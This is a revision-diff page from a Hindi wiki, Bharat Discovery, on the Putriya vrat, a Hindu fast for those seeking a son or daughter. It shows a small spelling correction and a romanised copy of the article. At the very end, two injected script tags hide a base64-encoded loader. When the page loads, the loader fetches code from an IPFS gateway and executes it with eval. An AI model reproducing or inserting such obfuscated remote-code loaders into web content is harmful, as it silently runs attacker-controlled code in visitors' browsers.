Difference between revisions of "पुत्रीय व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ॠग्वेद " to "ऋग्वेद ")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भाद्रपद]] [[पूर्णिमा]] के उपरान्त [[कृष्ण पक्ष]] की अष्टमी पर यह व्रत किया जाता है।
 
*[[भाद्रपद]] [[पूर्णिमा]] के उपरान्त [[कृष्ण पक्ष]] की अष्टमी पर यह व्रत किया जाता है।
 
*उस दिन उपवास रखा जाता है।
 
*उस दिन उपवास रखा जाता है।
 
*गोविन्द प्रतिमा को सर्वप्रथम एक प्रस्थ घी तथा क्रम से मधु, दही तथा दूध से नहलाना और तब सर्वोषधि से युक्त जल में नहलाना।
 
*गोविन्द प्रतिमा को सर्वप्रथम एक प्रस्थ घी तथा क्रम से मधु, दही तथा दूध से नहलाना और तब सर्वोषधि से युक्त जल में नहलाना।
 
*इसके उपरान्त उस पर चन्दन लेप, कुंकुम एवं कर्पूर लगाना।
 
*इसके उपरान्त उस पर चन्दन लेप, कुंकुम एवं कर्पूर लगाना।
*पुष्पों एवं अन्य उपचारों से प्रतिमा का पूजन।<ref>पुरुषसूक्त ([[ॠग्वेद]] 10-90) के साथ होम;</ref>  
+
*पुष्पों एवं अन्य उपचारों से प्रतिमा का पूजन।<ref>पुरुषसूक्त ([[ऋग्वेद]] 10-90) के साथ होम;</ref>  
 
*तब पुत्र या पुत्री चाहने वाला ऐसे फलों का दान करता है जो क्रम से पुंल्लिग या स्त्रीलिंग के सूचक हों।
 
*तब पुत्र या पुत्री चाहने वाला ऐसे फलों का दान करता है जो क्रम से पुंल्लिग या स्त्रीलिंग के सूचक हों।
 
*एक वर्ष तक किया जाता है।
 
*एक वर्ष तक किया जाता है।
 
*सभी इच्छाओं की पूर्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 1, 844-45, विष्णुधर्मोत्तरपुराण 2|55|1-12 से उद्धरण)।</ref>
 
*सभी इच्छाओं की पूर्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 1, 844-45, विष्णुधर्मोत्तरपुराण 2|55|1-12 से उद्धरण)।</ref>
 
 
 
 
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:24, 7 June 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • bhadrapad poornima ke uparant krishna paksh ki ashtami par yah vrat kiya jata hai.
  • us din upavas rakha jata hai.
  • govind pratima ko sarvapratham ek prasth ghi tatha kram se madhu, dahi tatha doodh se nahalana aur tab sarvoshadhi se yukt jal mean nahalana.
  • isake uparant us par chandan lep, kuankum evan karpoor lagana.
  • pushpoan evan any upacharoan se pratima ka poojan.[1]
  • tab putr ya putri chahane vala aise phaloan ka dan karata hai jo kram se puanllig ya striliang ke soochak hoan.
  • ek varsh tak kiya jata hai.
  • sabhi ichchhaoan ki poorti hoti hai.[2]

 

tika tippani aur sandarbh

  1. purushasookt (rrigved 10-90) ke sath hom;
  2. hemadri (vratakhand 1, 844-45, vishnudharmottarapuran 2|55|1-12 se uddharan).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>